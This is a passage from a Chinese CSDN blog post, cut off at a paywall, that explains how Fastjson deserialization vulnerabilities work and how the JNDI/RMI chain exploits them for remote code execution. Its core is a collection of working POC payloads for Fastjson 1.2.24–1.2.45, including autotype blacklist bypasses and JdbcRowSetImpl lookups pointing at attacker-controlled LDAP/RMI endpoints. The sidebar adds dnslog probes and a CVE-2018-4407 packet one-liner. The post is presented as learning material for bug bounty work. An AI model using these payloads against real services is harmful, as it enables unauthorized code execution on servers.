分享Fastjson反序列化漏洞原理+漏洞复现+实战案例+POC收集

最新推荐文章于 2025-05-28 18:03:10 发布
最新推荐文章于 2025-05-28 18:03:10 发布
阅读量2.3k 收藏 30
点赞数 19
CC 4.0 BY-SA版权
分类专栏: web 企业src/edusrc漏洞挖掘 文章标签: linux 运维 服务器 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SENMINGya/article/details/144877618

0x1 前言

哈喽师傅们,这篇文章自己写之前先是看了十几篇的Fastjson反序列化漏洞相关的文章,自己也是先学习了一遍,然后才写的这篇文章,这篇文章主要是分享Fastjson反序列化漏洞原理+漏洞复现+实战案例+POC收集,然后从不同的方面去介绍和利用Fastjson漏洞,特别是在收集POC的过程中,需要我们自己去验证它。还有就是复现相关Fastjson漏洞的时候对于我们本地的一个Java和jdk环境要求比较严格,最后面呢是以之前挖EDUSRC的一个学校的案例来给师傅们分享下实战中的Fastjson漏洞怎么利用。

image.png

0x2 Fastjson反序列化漏洞原理及介绍

一、浅谈

Fastjson反序列化漏洞也是一个知名度比较高的Java反序列化漏洞,他是阿里巴巴的开源库,下面我将主要带大家了解Fastjson反序列化漏洞的原理以及相关知识点的内容,然后带师傅们去利用rmi服务去复现这个Fastjson反序列化漏洞。

二、什么是json?

json是一种数据格式,对于我们互联网来说,我们服务器和客户端有大量的数据需要进行传输。以前通用的方式是xml,但是xml数据体重太大,效率低下,所以就有了另外一种数据格式,叫json。

json一共有两种体现:

  • json对象、json数组
  • json对象:json本身是一个字符串,{建:值, 建:值}

举例:

{
  "name" : "routing",
  "2003-11-11",
  "age" : 20,
  "likes" : ["看电影" , "看书"]
}

三、Fastjson概述

FastJson是啊里巴巴的的开源库,用于对JSON格式的数据进行解析和打包。其实简单的来说就是处理json格式的数据的。例如将json转换成一个类。或者是将一个类转换成一段json数据。

Fastjson 是一个 Java 库,提供了Java 对象与 JSON 相互转换。

  • toJSONString()方法:(序列化)将json对象转换成JSON字符串;
  • parseObject()方法:(反序列化)将JSON字符串转换成json对象。

使用方式:

//序列化
String text = JSON.toJSONString(obj); 
//反序列化
VO vo = JSON.parse(); //解析为JSONObject类型或者JSONArray类型
VO vo = JSON.parseObject("{...}"); //JSON文本解析成JSONObject类型
VO vo = JSON.parseObject("{...}", VO.class); //JSON文本解析成VO.class类

四、Fastjson漏洞原理

fastjson为了读取并判断传入的值是什么类型,增加了autotype机制导致了漏洞产生。

由于要获取json数据详细类型,每次都需要读取@type,而@type可以指定反序列化任意类调用其setgetis方法,并且由于反序列化的特性,我们可以通过目标类的set方法自由的设置类的属性值。

那么攻击者只要准备rmi服务和web服务,将rmi绝对路径注入到lookup方法中,受害者JNDI接口会指向攻击者控制rmi服务器,JNDI接口从攻击者控制的web服务器远程加载恶意代码并执行,形成RCE。

【JNDI提供了查找和访问各种命名和目录服务的通用、统一的接口。支持的服务:DNS,LDAP,RMI,CORBA等】

关于JNDI注入,大家可以看我之前写的一篇关于log4j的JNDI注入漏洞的详细介绍:

https://blog.csdn.net/SENMINGya/article/details/136819823?spm=1001.2014.3001.5502

五、Fastjson漏洞利用详解

1、攻击者(我们)访问存在fastjson漏洞的目标靶机网站,通过burpsuite抓包改包,以json格式添加com.sun.rowset.JdbcRowSetImpl恶意类信息发送给目标机。

2、存在漏洞的靶机对json反序列化时候,会加载执行我们构造的恶意信息(访问rmi服务器),靶机服务器就会向rmi服务器请求待执行的命令。也就是靶机服务器问rmi服务器,(靶机服务器)需要执行什么命令啊?

3、rmi 服务器请求加载远程机器的class(这个远程机器是我们搭建好的恶意站点,提前将漏洞利用的代码编译得到.class文件,并上传至恶意站点),得到攻击者(我们)构造好的命令(ping dnslog或者创建文件或者反弹shell啥的)

4、rmi将远程加载得到的class(恶意代码),作为响应返回给靶机服务器。

5、靶机服务器执行了恶意代码,被攻击者成功利用。

这里给大家看看红队大佬的图解,希望对大家理解fastjson漏洞原理的利用有帮助。

image.png

0x3 Fastjson漏洞POC收集

一、Fastjson 1.2.24版本

TemplatesImpl 反序列化

最终Poc

{
    "@type": "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
    "_bytecodes": ["恶意字节码"],
    "_name": "test",
    "_tfactory": {},
    "_outputProperties": {},
}

JdbcRowSetImpl 反序列化

最终Poc

{  

  "@type":"com.sun.rowset.JdbcRowSetImpl",  

  "dataSourceName":"ldap://127.0.0.1:1234/Exploit",  

  "autoCommit":true  

}

二、Fastjson 1.2.25版本

附上Poc

{  

  "@type":"[com.sun.rowset.JdbcRowSetImpl;",  

  "dataSourceName":"ldap://127.0.0.1:1234/Exploit",  

  "autoCommit":true  

}  

或   

{  

  "a":{  

    "@type":"LLcom.sun.rowset.JdbcRowSetImpl;;",  

    "dataSourceName":"rmi://test.com:9999/TouchFile",  

    "autoCommit":true  

  }  

}

三、Fastjson 1.2.42版本

最终Poc,添加两个类描述符

{  

  "@type":"LLcom.sun.rowset.JdbcRowSetImpl;;",  

  "dataSourceName":"ldap://127.0.0.1:1234/Exploit",  

  "autoCommit":true  

}

四、Fastjson 1.2.43版本

附上poc

{
    "@type":"[com.sun.rowset.JdbcRowSetImpl"[,
    {"dataSourceName":"ldap://127.0.0.1:1234/Exploit",
    "autoCommit":true
}

或
{
    "b":{
        "@type":"[com.sun.rowset.JdbcRowSetImpl"[{,
        "dataSourceName":"rmi://test.com:9999/TouchFile",
        "autoCommit":true
    }
}

五、Fastjson 1.2.45版本

分析版本来到fastjson1.2.45,此版本升级后,存在一个黑名单匹配绕过,绕过类

org.apache.ibatis.datasource.jndi.JndiDataSourceFactory

利用条件如下

  1. 目标服务端存在mybatis的jar包。
  2. 版本需为 3.x.x ~ 3.5.0
  3. autoTypeSupport属性为
最低0.47元/天 解锁文章

200万优质内容无限畅学
Fastjson反序列化漏洞原理漏洞复现
weixin_46263525的博客
04-04 1990
Fastjson反序列化漏洞原理及反弹shell利用
Java安全篇-Fastjson漏洞
m0_63138919的博客
03-28 4383
本文章参考网上师傅们的解题和代码审计思路,记录自己的学习过程,还希望各位博主 师傅 大佬 勿喷,还希望大家指出错误
Java代码审计16之fastjson反序列化漏洞(1)
划水的小白白
09-15 897
1、简介fastjson 2、fastjson的使用 2.1、将类序列化为字符串 2.2、将字符串还原为对象 2.3、小结以上 2.4、稍微扩展思路 3、fastjson漏洞利⽤原理与dnslog 4、JdbcRowSetImpl利用链 4.1、JdbcRowSetImpl的基本知识 4.2、利用代码复现 4.3、生成poc 4.4、模拟真实场景 4.5、利用链代码分析
fastjson 1.2.24-1.2.67 漏洞分析,附Poc分析
LTianHang的博客
05-28 1758
fastjson 1.2.24版本与1.2.67版本 之间的版本漏洞分析,和已公开的Poc分析,fastjson 1.2.68以上版本的漏洞分析,会开一篇新的文章进行整理
(FREE)快速掌握阿里FastJSON:高效Java-JSON转换实战
最新发布
CaiJIXC的博客
05-28 1458
【摘要】 本文介绍了阿里巴巴开源的高性能JSON库fastjson,以及使用测试
网站apache环境S2-057漏洞 利用POC 远程执行命令漏洞复现
网站安全专家
08-23 1438
S2-057漏洞,于2018年8月22日被曝出,该Struts2 057漏洞存在远程执行系统的命令,尤其使用linux系统,apache环境,影响范围较大,危害性较高,如果被攻击者利用直接提权到服务器管理员权限,网站数据被篡改,数据库被盗取都会发生。 目前我们SINE安全对该S2-057漏洞的测试,发现受影响的版本是Apache Struts 2.3–ApacheStruts2.3.34、Apa...
Fastjson反序列化漏洞利用原理POC
u012990687的专栏
11-30 1万+
0x01 前言 FastJson是开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到Java Bean。Fastjson应用范围非常广,在github上star数超过22k。2017年3月15日,fastjson官方主动爆出fastjson在1.2.24及之前版本存在远程代码执行高危安全漏洞。攻击者可以通过此漏洞远程执行恶意代码来入侵服务器。2020年6月1日 fastjson爆发新的反序列化远程代码执行漏洞,fastjso
Fastjson介绍
热门推荐
wutongyu344的专栏
03-05 3万+
简介 Fastjson是一个Java语言编写的高性能功能完善的JSON库。 高性能 fastjson采用独创的算法,将parse的速度提升到极致,超过所有json库,包括曾经号称最快的jackson。并且还超越了google的二进制协议protocol buf。 支持标准 Fastjson完全支持http://json.org的标准,也是官方网站收录的参考实现之一
CVE-2018-4407 漏洞复现POC
weixin_30608131的博客
11-01 286
pip install scapy    import scapy from scapy.all import * send(IP(dst="192.168.1.132",options=[IPOption("A"*8)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))    转载于:https:...
Fastjson反序列化漏洞
blackmagic的博客
08-09 1595
使用恶意MySQL的url作为参数创建一个com.mysql.cj.jdbc.admin.MiniAdmin对象可以通过MySQL的JDBC驱动的com.mysql.cj.jdbc.admin.MiniAdmin类创建一个指定url的JDBC连接。再通过LOAD DATA LOCAL INFILE语句读取任意文件。只要用户期望类继承自 Throwable 类,Fastjson便会将该类信任,从而造成只要是继承Throwable的任意类都可以被反序列化。生成恶意mysql文件后,
Fastjson反序列化漏洞详解
zhuyi666的博客
03-13 3258
fastjson介绍:fastjson 是一个java语言编写的高性能且功能完善的JSON库,它采用一种“假定有序快速匹配”的算法,把JSON Parse 的性能提升到了极致。FastJson是啊里巴巴的的开源库,用与对JSON格式的数据进行解析和打包。速度快使用广泛测试完备使用简单功能完备JSON数据格式{"name":zy, "age":22, "flag":true, "gender":male, "address":cs}("key":value)
fastjson-rce-exploit:利用fastjson远程执行代码漏洞
03-15
fastjson-rce-exploit poc for fastjson远程执行代码漏洞
Fastjson反序列化漏洞原理分析及复现
Armandhe的博客
10-26 3150
Fastjson反序列化漏洞原理分析及复现
fastjson 1.2.80版本反序列化漏洞POC代码及规避方案(20220523)
杨小熊学习笔记
05-29 8197
fasjton 1.2.80版本反序列化漏洞POC代码及规避方案(20220523)
【vulhub】fastjson反序列化漏洞验证POC
qq_45300786的博客
07-10 3824
盲打payload: 1.2.67版本前 {"zeo":{"@type":"java.net.Inet4Address","val":"fatu5k.dnslog.cn"}} 1.2.67版本后payload {"@type":"java.net.Inet4Address","val":"dnslog"} {"@type":"java.net.Inet6Address","val":"dnslog"} 这里我是fastjson1.2.24版本 先获取一个dnslog 抓包,然后加上我们的payloa
老生常谈的fastjson安全问题,从实战深入反序列化漏洞原理
2201_75353421的博客
06-20 3050
反序列化是java安全er避不开的技能点,也是非常难的一个点。这里我就先从我实战中遇到最多也是自己最熟悉的fastjson开始,这个漏洞老生长谈了,不过只要遇到就真是一个很好的点了。这里我先从效果开始再转战到原理,因为如果不懂代码,上来就分析代码就会让人望而却步。直接从漏洞利用开始,溯源到原理反倒是我这种非安全研究er的最好学习方式。
Fastjson反序列化
故事讲予风听
07-05 1734
fastjson
Spring RCE(CVE-2022-22965)漏洞复现POC
午夜安全
04-18 2829
漏洞编号 CVE-2022-22965 影响范围 受影响范围 Spring Framework < 5.3.18 Spring Framework < 5.2.20 及其衍生产品,且JDK>=9。 漏洞描述 Spring framework 是Spring 里面的一个基础开源框架,2022年3月31日,VMware Tanzu发布漏洞报告,Spring Framework存在远程代码执行漏洞,在 JDK 9+ 上运行的 Spring MVC 或 Spring WebFlux
Fastjson反序列化漏洞(自学)
m0_64481831的博客
03-04 1357
Fastjson是Java的一个库,可以将Java对象转化为JSON格式的字符串,也可以将JSON格式的字符串转化为Java对象。Fastjson调用toJSONString()方法即可将对象转换成JSON字符串,parseObject()方法将JSON字符串转换成对象。Fastjson是Java的一个库,调用toJSONString方法将对象转换成字符串,调用parseObject方法将字符串转换为对象。
fastjson反序列化漏洞POC快速入门指南
当说“fastjson 反序列化 漏洞 POC”时,我们指的是一个能够证明fastjson反序列化漏洞存在的实际案例,它通常包括一个恶意构造的JSON字符串,这个字符串在被fastjson库处理时会触发安全漏洞。 为了避免fastjson反序...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一个想当文人的黑客

您的鼓励是对我最大的动力!!!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值